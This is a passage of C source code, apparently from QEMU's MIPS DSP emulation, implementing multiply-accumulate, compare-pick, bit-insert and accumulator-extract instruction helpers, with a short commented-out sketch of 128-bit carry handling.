    env->active_tc.LO[ac] = (target_long)(int32_t) \
        (temp & MIPSDSP_LLO); \
}

DP_L_W(dpaq_sa_l_w, 1);
DP_L_W(dpsq_sa_l_w, 0);
#undef DP_L_W

#if defined(TARGET_MIPS64)
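/*
 * Editorial sketch (not part of the original source): the 64-bit helpers
 * below model each 128-bit accumulator as two uint64_t halves and detect
 * carry out of the low half by comparing the wrapped sum against an
 * operand. A minimal standalone restatement of that idiom, assuming only
 * standard C types:
 */
#if 0 /* illustrative only, not compiled */
static void acc128_add(uint64_t a[2], const uint64_t b[2])
{
    uint64_t lo = a[0] + b[0];

    /* An unsigned add wrapped around iff the result is smaller than an
     * operand; if so, propagate one carry into the high half. */
    if (lo < a[0]) {
        a[1] += 1;
    }
    a[0] = lo;
    a[1] += b[1];
}
#endif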
#define DP_L_PW(name, func) \ void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ CPUMIPSState *env) \ { \ int32_t rs1, rs0; \ int32_t rt1, rt0; \ int64_t tempB[2], tempA[2]; \ int64_t temp[2]; \ int64_t acc[2]; \ int64_t temp_sum; \ \ temp[0] = 0; \ temp[1] = 0; \ \ MIPSDSP_SPLIT64_32(rs, rs1, rs0); \ MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ \ tempB[0] = mipsdsp_mul_q31_q31(ac, rs1, rt1, env); \ tempA[0] = mipsdsp_mul_q31_q31(ac, rs0, rt0, env); \ \ if (tempB[0] >= 0) { \ tempB[1] = 0x00; \ } else { \ tempB[1] = ~0ull; \ } \ \ if (tempA[0] >= 0) { \ tempA[1] = 0x00; \ } else { \ tempA[1] = ~0ull; \ } \ \ temp_sum = tempB[0] + tempA[0]; \ if (((uint64_t)temp_sum < (uint64_t)tempB[0]) && \ ((uint64_t)temp_sum < (uint64_t)tempA[0])) { \ temp[1] += 1; \ } \ temp[0] = temp_sum; \ temp[1] += tempB[1] + tempA[1]; \ \ mipsdsp_##func(acc, ac, temp, env); \ \ env->active_tc.HI[ac] = acc[1]; \ env->active_tc.LO[ac] = acc[0]; \ } DP_L_PW(dpaq_sa_l_pw, sat64_acc_add_q63); DP_L_PW(dpsq_sa_l_pw, sat64_acc_sub_q63); #undef DP_L_PW void helper_mulsaq_s_l_pw(target_ulong rs, target_ulong rt, uint32_t ac, CPUMIPSState *env) { int32_t rs1, rs0; int32_t rt1, rt0; int64_t tempB[2], tempA[2]; int64_t temp[2]; int64_t acc[2]; int64_t temp_sum; rs1 = (rs >> 32) & MIPSDSP_LLO; rs0 = rs & MIPSDSP_LLO; rt1 = (rt >> 32) & MIPSDSP_LLO; rt0 = rt & MIPSDSP_LLO; tempB[0] = mipsdsp_mul_q31_q31(ac, rs1, rt1, env); tempA[0] = mipsdsp_mul_q31_q31(ac, rs0, rt0, env); if (tempB[0] >= 0) { tempB[1] = 0x00; } else { tempB[1] = ~0ull; } if (tempA[0] >= 0) { tempA[1] = 0x00; } else { tempA[1] = ~0ull; } acc[0] = env->active_tc.LO[ac]; acc[1] = env->active_tc.HI[ac]; temp_sum = tempB[0] - tempA[0]; if ((uint64_t)temp_sum > (uint64_t)tempB[0]) { tempB[1] -= 1; } temp[0] = temp_sum; temp[1] = tempB[1] - tempA[1]; if ((temp[1] & 0x01) == 0) { temp[1] = 0x00; } else { temp[1] = ~0ull; } temp_sum = acc[0] + temp[0]; if (((uint64_t)temp_sum < (uint64_t)acc[0]) && ((uint64_t)temp_sum < (uint64_t)temp[0])) { acc[1] += 1; } acc[0] = temp_sum; acc[1] += temp[1]; env->active_tc.HI[ac] = acc[1]; env->active_tc.LO[ac] = acc[0]; } #endif #define MAQ_S_W(name, mov) \ void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int16_t rsh, rth; \ int32_t tempA; \ int64_t tempL, acc; \ \ rsh = (rs >> mov) & MIPSDSP_LO; \ rth = (rt >> mov) & MIPSDSP_LO; \ tempA = mipsdsp_mul_q15_q15(ac, rsh, rth, env); \ acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ tempL = (int64_t)tempA + acc; \ env->active_tc.HI[ac] = (target_long)(int32_t) \ ((tempL & MIPSDSP_LHI) >> 32); \ env->active_tc.LO[ac] = (target_long)(int32_t) \ (tempL & MIPSDSP_LLO); \ } MAQ_S_W(maq_s_w_phl, 16); MAQ_S_W(maq_s_w_phr, 0); #undef MAQ_S_W #define MAQ_SA_W(name, mov) \ void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int16_t rsh, rth; \ int32_t tempA; \ \ rsh = (rs >> mov) & MIPSDSP_LO; \ rth = (rt >> mov) & MIPSDSP_LO; \ tempA = mipsdsp_mul_q15_q15(ac, rsh, rth, env); \ tempA = mipsdsp_sat32_acc_q31(ac, tempA, env); \ \ env->active_tc.HI[ac] = (target_long)(int32_t)(((int64_t)tempA & \ MIPSDSP_LHI) >> 32); \ env->active_tc.LO[ac] = (target_long)(int32_t)((int64_t)tempA & \ MIPSDSP_LLO); \ } MAQ_SA_W(maq_sa_w_phl, 16); MAQ_SA_W(maq_sa_w_phr, 0); #undef MAQ_SA_W #define MULQ_W(name, addvar) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int32_t rs_t, rt_t; \ int32_t tempI; \ int64_t tempL; \ \ rs_t = rs & 
MIPSDSP_LLO; \ rt_t = rt & MIPSDSP_LLO; \ \ if ((rs_t == 0x80000000) && (rt_t == 0x80000000)) { \ tempL = 0x7FFFFFFF00000000ull; \ set_DSPControl_overflow_flag(1, 21, env); \ } else { \ tempL = ((int64_t)rs_t * (int64_t)rt_t) << 1; \ tempL += addvar; \ } \ tempI = (tempL & MIPSDSP_LHI) >> 32; \ \ return (target_long)(int32_t)tempI; \ } MULQ_W(mulq_s_w, 0); MULQ_W(mulq_rs_w, 0x80000000ull); #undef MULQ_W #if defined(TARGET_MIPS64) #define MAQ_S_W_QH(name, mov) \ void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ CPUMIPSState *env) \ { \ int16_t rs_t, rt_t; \ int32_t temp_mul; \ int64_t temp[2]; \ int64_t acc[2]; \ int64_t temp_sum; \ \ temp[0] = 0; \ temp[1] = 0; \ \ rs_t = (rs >> mov) & MIPSDSP_LO; \ rt_t = (rt >> mov) & MIPSDSP_LO; \ temp_mul = mipsdsp_mul_q15_q15(ac, rs_t, rt_t, env); \ \ temp[0] = (int64_t)temp_mul; \ if (temp[0] >= 0) { \ temp[1] = 0x00; \ } else { \ temp[1] = ~0ull; \ } \ \ acc[0] = env->active_tc.LO[ac]; \ acc[1] = env->active_tc.HI[ac]; \ \ temp_sum = acc[0] + temp[0]; \ if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ acc[1] += 1; \ } \ acc[0] = temp_sum; \ acc[1] += temp[1]; \ \ env->active_tc.HI[ac] = acc[1]; \ env->active_tc.LO[ac] = acc[0]; \ } MAQ_S_W_QH(maq_s_w_qhll, 48); MAQ_S_W_QH(maq_s_w_qhlr, 32); MAQ_S_W_QH(maq_s_w_qhrl, 16); MAQ_S_W_QH(maq_s_w_qhrr, 0); #undef MAQ_S_W_QH #define MAQ_SA_W(name, mov) \ void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ CPUMIPSState *env) \ { \ int16_t rs_t, rt_t; \ int32_t temp; \ int64_t acc[2]; \ \ rs_t = (rs >> mov) & MIPSDSP_LO; \ rt_t = (rt >> mov) & MIPSDSP_LO; \ temp = mipsdsp_mul_q15_q15(ac, rs_t, rt_t, env); \ temp = mipsdsp_sat32_acc_q31(ac, temp, env); \ \ acc[0] = (int64_t)(int32_t)temp; \ if (acc[0] >= 0) { \ acc[1] = 0x00; \ } else { \ acc[1] = ~0ull; \ } \ \ env->active_tc.HI[ac] = acc[1]; \ env->active_tc.LO[ac] = acc[0]; \ } MAQ_SA_W(maq_sa_w_qhll, 48); MAQ_SA_W(maq_sa_w_qhlr, 32); MAQ_SA_W(maq_sa_w_qhrl, 16); MAQ_SA_W(maq_sa_w_qhrr, 0); #undef MAQ_SA_W #define MAQ_S_L_PW(name, mov) \ void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ CPUMIPSState *env) \ { \ int32_t rs_t, rt_t; \ int64_t temp[2]; \ int64_t acc[2]; \ int64_t temp_sum; \ \ temp[0] = 0; \ temp[1] = 0; \ \ rs_t = (rs >> mov) & MIPSDSP_LLO; \ rt_t = (rt >> mov) & MIPSDSP_LLO; \ \ temp[0] = mipsdsp_mul_q31_q31(ac, rs_t, rt_t, env); \ if (temp[0] >= 0) { \ temp[1] = 0x00; \ } else { \ temp[1] = ~0ull; \ } \ \ acc[0] = env->active_tc.LO[ac]; \ acc[1] = env->active_tc.HI[ac]; \ \ temp_sum = acc[0] + temp[0]; \ if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ acc[1] += 1; \ } \ acc[0] = temp_sum; \ acc[1] += temp[1]; \ \ env->active_tc.HI[ac] = acc[1]; \ env->active_tc.LO[ac] = acc[0]; \ } MAQ_S_L_PW(maq_s_l_pwl, 32); MAQ_S_L_PW(maq_s_l_pwr, 0); #undef MAQ_S_L_PW #define DM_OPERATE(name, func, is_add, sigext) \ void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ CPUMIPSState *env) \ { \ int32_t rs1, rs0; \ int32_t rt1, rt0; \ int64_t tempBL[2], tempAL[2]; \ int64_t acc[2]; \ int64_t temp[2]; \ int64_t temp_sum; \ \ temp[0] = 0x00; \ temp[1] = 0x00; \ \ MIPSDSP_SPLIT64_32(rs, rs1, rs0); \ MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ \ if (sigext) { \ tempBL[0] = (int64_t)mipsdsp_##func(rs1, rt1); \ tempAL[0] = (int64_t)mipsdsp_##func(rs0, rt0); \ \ if (tempBL[0] >= 0) { \ tempBL[1] = 0x0; \ } else { \ tempBL[1] = ~0ull; \ } \ \ if (tempAL[0] >= 0) { \ tempAL[1] = 0x0; \ } else { \ tempAL[1] = ~0ull; \ 
} \ } else { \ tempBL[0] = mipsdsp_##func(rs1, rt1); \ tempAL[0] = mipsdsp_##func(rs0, rt0); \ tempBL[1] = 0; \ tempAL[1] = 0; \ } \ \ acc[1] = env->active_tc.HI[ac]; \ acc[0] = env->active_tc.LO[ac]; \ \ temp_sum = tempBL[0] + tempAL[0]; \ if (((uint64_t)temp_sum < (uint64_t)tempBL[0]) && \ ((uint64_t)temp_sum < (uint64_t)tempAL[0])) { \ temp[1] += 1; \ } \ temp[0] = temp_sum; \ temp[1] += tempBL[1] + tempAL[1]; \ \ if (is_add) { \ temp_sum = acc[0] + temp[0]; \ if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ acc[1] += 1; \ } \ temp[0] = temp_sum; \ temp[1] = acc[1] + temp[1]; \ } else { \ temp_sum = acc[0] - temp[0]; \ if ((uint64_t)temp_sum > (uint64_t)acc[0]) { \ acc[1] -= 1; \ } \ temp[0] = temp_sum; \ temp[1] = acc[1] - temp[1]; \ } \ \ env->active_tc.HI[ac] = temp[1]; \ env->active_tc.LO[ac] = temp[0]; \ } DM_OPERATE(dmadd, mul_i32_i32, 1, 1); DM_OPERATE(dmaddu, mul_u32_u32, 1, 0); DM_OPERATE(dmsub, mul_i32_i32, 0, 1); DM_OPERATE(dmsubu, mul_u32_u32, 0, 0); #undef DM_OPERATE #endif /** DSP Bit/Manipulation Sub-class insns **/ target_ulong helper_bitrev(target_ulong rt) { int32_t temp; uint32_t rd; int i; temp = rt & MIPSDSP_LO; rd = 0; for (i = 0; i < 16; i++) { rd = (rd << 1) | (temp & 1); temp = temp >> 1; } return (target_ulong)rd; } #define BIT_INSV(name, posfilter, ret_type) \ target_ulong helper_##name(CPUMIPSState *env, target_ulong rs, \ target_ulong rt) \ { \ uint32_t pos, size, msb, lsb; \ uint32_t const sizefilter = 0x3F; \ target_ulong temp; \ target_ulong dspc; \ \ dspc = env->active_tc.DSPControl; \ \ pos = dspc & posfilter; \ size = (dspc >> 7) & sizefilter; \ \ msb = pos + size - 1; \ lsb = pos; \ \ if (lsb > msb || (msb > TARGET_LONG_BITS)) { \ return rt; \ } \ \ temp = deposit64(rt, pos, size, rs); \ \ return (target_long)(ret_type)temp; \ } BIT_INSV(insv, 0x1F, int32_t); #ifdef TARGET_MIPS64 BIT_INSV(dinsv, 0x7F, target_long); #endif #undef BIT_INSV /** DSP Compare-Pick Sub-class insns **/ #define CMP_HAS_RET(name, func, split_num, filter, bit_size) \ target_ulong helper_##name(target_ulong rs, target_ulong rt) \ { \ uint32_t rs_t, rt_t; \ uint8_t cc; \ uint32_t temp = 0; \ int i; \ \ for (i = 0; i < split_num; i++) { \ rs_t = (rs >> (bit_size * i)) & filter; \ rt_t = (rt >> (bit_size * i)) & filter; \ cc = mipsdsp_##func(rs_t, rt_t); \ temp |= cc << i; \ } \ \ return (target_ulong)temp; \ } CMP_HAS_RET(cmpgu_eq_qb, cmpu_eq, 4, MIPSDSP_Q0, 8); CMP_HAS_RET(cmpgu_lt_qb, cmpu_lt, 4, MIPSDSP_Q0, 8); CMP_HAS_RET(cmpgu_le_qb, cmpu_le, 4, MIPSDSP_Q0, 8); #ifdef TARGET_MIPS64 CMP_HAS_RET(cmpgu_eq_ob, cmpu_eq, 8, MIPSDSP_Q0, 8); CMP_HAS_RET(cmpgu_lt_ob, cmpu_lt, 8, MIPSDSP_Q0, 8); CMP_HAS_RET(cmpgu_le_ob, cmpu_le, 8, MIPSDSP_Q0, 8); #endif #undef CMP_HAS_RET #define CMP_NO_RET(name, func, split_num, filter, bit_size) \ void helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int##bit_size##_t rs_t, rt_t; \ int##bit_size##_t flag = 0; \ int##bit_size##_t cc; \ int i; \ \ for (i = 0; i < split_num; i++) { \ rs_t = (rs >> (bit_size * i)) & filter; \ rt_t = (rt >> (bit_size * i)) & filter; \ \ cc = mipsdsp_##func((int32_t)rs_t, (int32_t)rt_t); \ flag |= cc << i; \ } \ \ set_DSPControl_24(flag, split_num, env); \ } CMP_NO_RET(cmpu_eq_qb, cmpu_eq, 4, MIPSDSP_Q0, 8); CMP_NO_RET(cmpu_lt_qb, cmpu_lt, 4, MIPSDSP_Q0, 8); CMP_NO_RET(cmpu_le_qb, cmpu_le, 4, MIPSDSP_Q0, 8); CMP_NO_RET(cmp_eq_ph, cmp_eq, 2, MIPSDSP_LO, 16); CMP_NO_RET(cmp_lt_ph, cmp_lt, 2, MIPSDSP_LO, 16); CMP_NO_RET(cmp_le_ph, cmp_le, 2, MIPSDSP_LO, 
16); #ifdef TARGET_MIPS64 CMP_NO_RET(cmpu_eq_ob, cmpu_eq, 8, MIPSDSP_Q0, 8); CMP_NO_RET(cmpu_lt_ob, cmpu_lt, 8, MIPSDSP_Q0, 8); CMP_NO_RET(cmpu_le_ob, cmpu_le, 8, MIPSDSP_Q0, 8); CMP_NO_RET(cmp_eq_qh, cmp_eq, 4, MIPSDSP_LO, 16); CMP_NO_RET(cmp_lt_qh, cmp_lt, 4, MIPSDSP_LO, 16); CMP_NO_RET(cmp_le_qh, cmp_le, 4, MIPSDSP_LO, 16); CMP_NO_RET(cmp_eq_pw, cmp_eq, 2, MIPSDSP_LLO, 32); CMP_NO_RET(cmp_lt_pw, cmp_lt, 2, MIPSDSP_LLO, 32); CMP_NO_RET(cmp_le_pw, cmp_le, 2, MIPSDSP_LLO, 32); #endif #undef CMP_NO_RET #if defined(TARGET_MIPS64) #define CMPGDU_OB(name) \ target_ulong helper_cmpgdu_##name##_ob(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int i; \ uint8_t rs_t, rt_t; \ uint32_t cond; \ \ cond = 0; \ \ for (i = 0; i < 8; i++) { \ rs_t = (rs >> (8 * i)) & MIPSDSP_Q0; \ rt_t = (rt >> (8 * i)) & MIPSDSP_Q0; \ \ if (mipsdsp_cmpu_##name(rs_t, rt_t)) { \ cond |= 0x01 << i; \ } \ } \ \ set_DSPControl_24(cond, 8, env); \ \ return (uint64_t)cond; \ } CMPGDU_OB(eq) CMPGDU_OB(lt) CMPGDU_OB(le) #undef CMPGDU_OB #endif #define PICK_INSN(name, split_num, filter, bit_size, ret32bit) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ uint32_t rs_t, rt_t; \ uint32_t cc; \ target_ulong dsp; \ int i; \ target_ulong result = 0; \ \ dsp = env->active_tc.DSPControl; \ for (i = 0; i < split_num; i++) { \ rs_t = (rs >> (bit_size * i)) & filter; \ rt_t = (rt >> (bit_size * i)) & filter; \ cc = (dsp >> (24 + i)) & 0x01; \ cc = cc == 1 ? rs_t : rt_t; \ \ result |= (target_ulong)cc << (bit_size * i); \ } \ \ if (ret32bit) { \ result = (target_long)(int32_t)(result & MIPSDSP_LLO); \ } \ \ return result; \ } PICK_INSN(pick_qb, 4, MIPSDSP_Q0, 8, 1); PICK_INSN(pick_ph, 2, MIPSDSP_LO, 16, 1); #ifdef TARGET_MIPS64 PICK_INSN(pick_ob, 8, MIPSDSP_Q0, 8, 0); PICK_INSN(pick_qh, 4, MIPSDSP_LO, 16, 0); PICK_INSN(pick_pw, 2, MIPSDSP_LLO, 32, 0); #endif #undef PICK_INSN target_ulong helper_packrl_ph(target_ulong rs, target_ulong rt) { uint32_t rsl, rth; rsl = rs & MIPSDSP_LO; rth = (rt & MIPSDSP_HI) >> 16; return (target_long)(int32_t)((rsl << 16) | rth); } #if defined(TARGET_MIPS64) target_ulong helper_packrl_pw(target_ulong rs, target_ulong rt) { uint32_t rs0, rt1; rs0 = rs & MIPSDSP_LLO; rt1 = (rt >> 32) & MIPSDSP_LLO; return ((uint64_t)rs0 << 32) | (uint64_t)rt1; } #endif /** DSP Accumulator and DSPControl Access Sub-class insns **/ target_ulong helper_extr_w(target_ulong ac, target_ulong shift, CPUMIPSState *env) { int32_t tempI; int64_t tempDL[2]; shift = shift & 0x1F; mipsdsp_rndrashift_short_acc(tempDL, ac, shift, env); if ((tempDL[1] != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && (tempDL[1] != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { set_DSPControl_overflow_flag(1, 23, env); } tempI = (tempDL[0] >> 1) & MIPSDSP_LLO; tempDL[0] += 1; if (tempDL[0] == 0) { tempDL[1] += 1; } if (((tempDL[1] & 0x01) != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && ((tempDL[1] & 0x01) != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { set_DSPControl_overflow_flag(1, 23, env); } return (target_long)tempI; } target_ulong helper_extr_r_w(target_ulong ac, target_ulong shift, CPUMIPSState *env) { int64_t tempDL[2]; shift = shift & 0x1F; mipsdsp_rndrashift_short_acc(tempDL, ac, shift, env); if ((tempDL[1] != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && (tempDL[1] != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { set_DSPControl_overflow_flag(1, 23, env); } tempDL[0] += 1; if (tempDL[0] == 0) { tempDL[1] += 1; } if (((tempDL[1] & 0x01) != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && ((tempDL[1] & 0x01) != 1 
|| (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { set_DSPControl_overflow_flag(1, 23, env); } return (target_long)(int32_t)(tempDL[0] >> 1); } target_ulong helper_extr_rs_w(target_ulong ac, target_ulong shift, CPUMIPSState *env) { int32_t tempI, temp64; int64_t tempDL[2]; shift = shift & 0x1F; mipsdsp_rndrashift_short_acc(tempDL, ac, shift, env); if ((tempDL[1] != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && (tempDL[1] != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { set_DSPControl_overflow_flag(1, 23, env); } tempDL[0] += 1; if (tempDL[0] == 0) { tempDL[1] += 1; } tempI = tempDL[0] >> 1; if (((tempDL[1] & 0x01) != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && ((tempDL[1] & 0x01) != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { temp64 = tempDL[1] & 0x01; if (temp64 == 0) { tempI = 0x7FFFFFFF; } else { tempI = 0x80000000; } set_DSPControl_overflow_flag(1, 23, env); } return (target_long)tempI; } #if defined(TARGET_MIPS64) target_ulong helper_dextr_w(target_ulong ac, target_ulong shift, CPUMIPSState *env) { uint64_t temp[3]; shift = shift & 0x3F; mipsdsp_rndrashift_acc(temp, ac, shift, env); return (int64_t)(int32_t)(temp[0] >> 1); } target_ulong helper_dextr_r_w(target_ulong ac, target_ulong shift, CPUMIPSState *env) { uint64_t temp[3]; uint32_t temp128; shift = shift & 0x3F; mipsdsp_rndrashift_acc(temp, ac, shift, env); temp[0] += 1; if (temp[0] == 0) { temp[1] += 1; if (temp[1] == 0) { temp[2] += 1; } } temp128 = temp[2] & 0x01; if ((temp128 != 0 || temp[1] != 0) && (temp128 != 1 || temp[1] != ~0ull)) { set_DSPControl_overflow_flag(1, 23, env); } return (int64_t)(int32_t)(temp[0] >> 1); } target_ulong helper_dextr_rs_w(target_ulong ac, target_ulong shift, CPUMIPSState *env) { uint64_t temp[3]; uint32_t temp128; shift = shift & 0x3F; mipsdsp_rndrashift_acc(temp, ac, shift, env); temp[0] += 1; if (temp[0] == 0) { temp[1] += 1; if (temp[1] == 0) { temp[2] += 1; } } temp128 = temp[2] & 0x01; if ((temp128 != 0 || temp[1] != 0) && (temp128 != 1 || temp[1] != ~0ull)) { if (temp128 == 0) { temp[0] = 0x0FFFFFFFF; } else { temp[0] = 0x0100000000ULL; } set_DSPControl_overflow_flag(1, 23, env); } return (int64_t)(int32_t)(temp[0] >> 1); } target_ulong helper_dextr_l(target_ulong ac, target_ulong shift, CPUMIPSState *env) { uint64_t temp[3]; target_ulong ret; shift = shift & 0x3F; mipsdsp_rndrashift_acc(temp, ac, shift, env); ret = (temp[1] << 63) | (temp[0] >> 1); return ret; } target_ulong helper_dextr_r_l(target_ulong ac, target_ulong shift, CPUMIPSState *env) { uint64_t temp[3]; uint32_t temp128; target_ulong ret; shift = shift & 0x3F; mipsdsp_rndrashift_acc(temp, ac, shift, env); temp[0] += 1; if (temp[0] == 0) { temp[1] += 1; if (temp[1] == 0) { temp[2] += 1; } } temp128 = temp[2] & 0x01; if ((temp128 != 0 || temp[1] != 0) && (temp128 != 1 || temp[1] != ~0ull)) { set_DSPControl_overflow_flag(1, 23, env); } ret = (temp[1] << 63) | (temp[0] >> 1); return ret; } target_ulong helper_dextr_rs_l(target_ulong ac, target_ulong shift, CPUMIPSState *env) { uint64_t temp[3]; uint32_t temp128; target_ulong ret; shift = shift & 0x3F; mipsdsp_rndrashift_acc(temp, ac, shift, env); temp[0] += 1; if (temp[0] == 0) { temp[1] += 1; if (temp[1] == 0) { temp[2] += 1; } } temp128 = temp[2] & 0x01; if ((temp128 != 0 || temp[1] != 0) && (temp128 != 1 || temp[1] != ~0ull)) { if (temp128 == 0) { temp[1] &= ~0x00ull - 1; temp[0] |= ~0x00ull - 1; } else { temp[1] |= 0x01; temp[0] &= 0x01; } set_DSPControl_overflow_flag(1, 23, env); } ret = (temp[1] << 63) | (temp[0] >> 1); return ret; } #endif target_ulong 
helper_extr_s_h(target_ulong ac, target_ulong shift, CPUMIPSState *env)
{
    int64_t temp, acc;

    shift = shift & 0x1F;

    acc = ((int64_t)env->active_tc.HI[ac] << 32) |
          ((int64_t)env->active_tc.LO[ac] & 0xFFFFFFFF);

    temp = acc >> shift;

    if (temp > (int64_t)0x7FFF) {
        temp = 0x00007FFF;
        set_DSPControl_overflow_flag(1, 23, env);
    } else if (temp < (int64_t)0xFFFFFFFFFFFF8000ULL) {
        temp = 0xFFFF8000;
        set_DSPControl_overflow_flag(1, 23, env);
    }

    return (target_long)(int32_t)(temp & 0xFFFFFFFF);
}

#if defined(TARGET_MIPS64)
target_ulong helper_dextr_s_h(target_ulong ac, target_ulong shift,
                              CPUMIPSState *env)
{
    int64_t temp[2];
    uint32_t temp127;

    shift = shift & 0x1F;

    mipsdsp_rashift_acc((uint64_t *)temp, ac, shift, env);

    temp127 = (temp[1] >> 63) & 0x01;

    if ((temp127 == 0) && (temp[1] > 0 || temp[0] > 32767)) {
        temp[0] &= 0xFFFF0000;
        temp[0] |= 0x00007FFF;
        set_DSPControl_overflow_flag(1, 23, env);
    } else if ((temp127 == 1) &&
               (temp[1] < 0xFFFFFFFFFFFFFFFFll
                || temp[0] < 0xFFFFFFFFFFFF8000ll)) {
        temp[0] &= 0xFFFF0000;
        temp[0] |= 0x00008000;
        set_DSPControl_overflow_flag(1, 23, env);
    }

    return (int64_t)(int16_t)(temp[0] & MIPSDSP_LO);
}
#endif

target_ulong helper_extp(target_ulong ac, target_ulong size,
                         CPUMIPSState *env)
{
    int32_t start_pos;
    int sub;
    uint32_t temp;
    uint64_t acc;

    size = size & 0x1F;
    temp = 0;
    start_pos = get_DSPControl_pos(env);
    sub = start_pos - (size + 1);
    if (sub >= -1) {
        acc = ((uint64_t)env->active_tc.HI[ac] << 32) |
              ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO);
        temp = (acc >> (start_pos - size)) & (~0U >> (31 - size));
        set_DSPControl_efi(0, env);
    } else {
        set_DSPControl_efi(1, env);
    }

    return (target_ulong)temp;
}

target_ulong helper_extpdp(target_ulong ac, target_ulong size,
                           CPUMIPSState *env)
{
    int32_t start_pos;
    int sub;
    uint32_t temp;
    uint64_t acc;

    size = size & 0x1F;
    temp = 0;
    start_pos = get_DSPControl_pos(env);
    sub = start_pos - (size + 1);
    if (sub >= -1) {
        acc = ((uint64_t)env->active_tc.HI[ac] << 32) |
              ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO);
        temp = extract64(acc, start_pos - size, size + 1);
        set_DSPControl_pos(sub, env);
        set_DSPControl_efi(0, env);
    } else {
        set_DSPControl_efi(1, env);
    }

    return (target_ulong)temp;
}

#if defined(TARGET_MIPS64)
target_ulong helper_dextp(target_ulong ac, target_ulong size,
                          CPUMIPSState *env)
{
    int start_pos;
    int len;
    int sub;
    uint64_t tempB, tempA;
    uint64_t temp;

    temp = 0;
    size = size & 0x3F;
    start_pos = get_DSPControl_pos(env);
    len = start_pos - size;
    tempB = env->active_tc.HI[ac];
    tempA = env->active_tc.LO[ac];

    sub = start_pos - (size + 1);

    if (sub >= -1) {
        temp = (tempB << (64 - len)) | (tempA >> len);
        temp = temp & ((1ULL << (size + 1)) - 1);
        set_DSPControl_efi(0, env);
    } else {
        set_DSPControl_efi(1, env);
    }

    return temp;
}

target_ulong helper_dextpdp(target_ulong ac, target_ulong size,
                            CPUMIPSState *env)
{
    int start_pos;
    int len;
    int sub;
    uint64_t tempB, tempA;
    uint64_t temp;

    temp = 0;
    size = size & 0x3F;
    start_pos = get_DSPControl_pos(env);
    len = start_pos - size;
    tempB = env->active_tc.HI[ac];
    tempA = env->active_tc.LO[ac];

    sub = start_pos - (size + 1);

    if (sub >= -1) {
        temp = (tempB << (64 - len)) | (tempA >> len);
        temp = temp & ((1ULL << (size + 1)) - 1);
        set_DSPControl_pos(sub, env);
        set_DSPControl_efi(0, env);
    } else {
        set_DSPControl_efi(1, env);
    }

    return temp;
}
#endif

void helper_shilo(target_ulong ac, target_ulong rs, CPUMIPSState *env)
{
    int8_t rs5_0;
    uint64_t temp, acc;

    rs5_0 = rs & 0x3F;
    rs5_0 = (int8_t)(rs5_0 << 2) >> 2;

    if (unlikely(rs5_0 == 0)) {
        return;
    }

    acc = (((uint64_t)env->active_tc.HI[ac] << 32) & MIPSDSP_LHI) |
((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); if (rs5_0 > 0) { temp = acc >> rs5_0; } else { temp = acc << -rs5_0; } env->active_tc.HI[ac] = (target_ulong)(int32_t)((temp & MIPSDSP_LHI) >> 32); env->active_tc.LO[ac] = (target_ulong)(int32_t)(temp & MIPSDSP_LLO); } #if defined(TARGET_MIPS64) void helper_dshilo(target_ulong shift, target_ulong ac, CPUMIPSState *env) { int8_t shift_t; uint64_t tempB, tempA; shift_t = (int8_t)(shift << 1) >> 1; tempB = env->active_tc.HI[ac]; tempA = env->active_tc.LO[ac]; if (shift_t != 0) { if (shift_t >= 0) { tempA = (tempB << (64 - shift_t)) | (tempA >> shift_t); tempB = tempB >> shift_t; } else { shift_t = -shift_t; tempB = (tempB << shift_t) | (tempA >> (64 - shift_t)); tempA = tempA << shift_t; } } env->active_tc.HI[ac] = tempB; env->active_tc.LO[ac] = tempA; } #endif void helper_mthlip(target_ulong ac, target_ulong rs, CPUMIPSState *env) { int32_t tempA, tempB, pos; tempA = rs; tempB = env->active_tc.LO[ac]; env->active_tc.HI[ac] = (target_long)tempB; env->active_tc.LO[ac] = (target_long)tempA; pos = get_DSPControl_pos(env); if (pos > 32) { return; } else { set_DSPControl_pos(pos + 32, env); } } #if defined(TARGET_MIPS64) void helper_dmthlip(target_ulong rs, target_ulong ac, CPUMIPSState *env) { uint8_t ac_t; uint8_t pos; uint64_t tempB, tempA; ac_t = ac & 0x3; tempA = rs; tempB = env->active_tc.LO[ac_t]; env->active_tc.HI[ac_t] = tempB; env->active_tc.LO[ac_t] = tempA; pos = get_DSPControl_pos(env); if (pos <= 64) { pos = pos + 64; set_DSPControl_pos(pos, env); 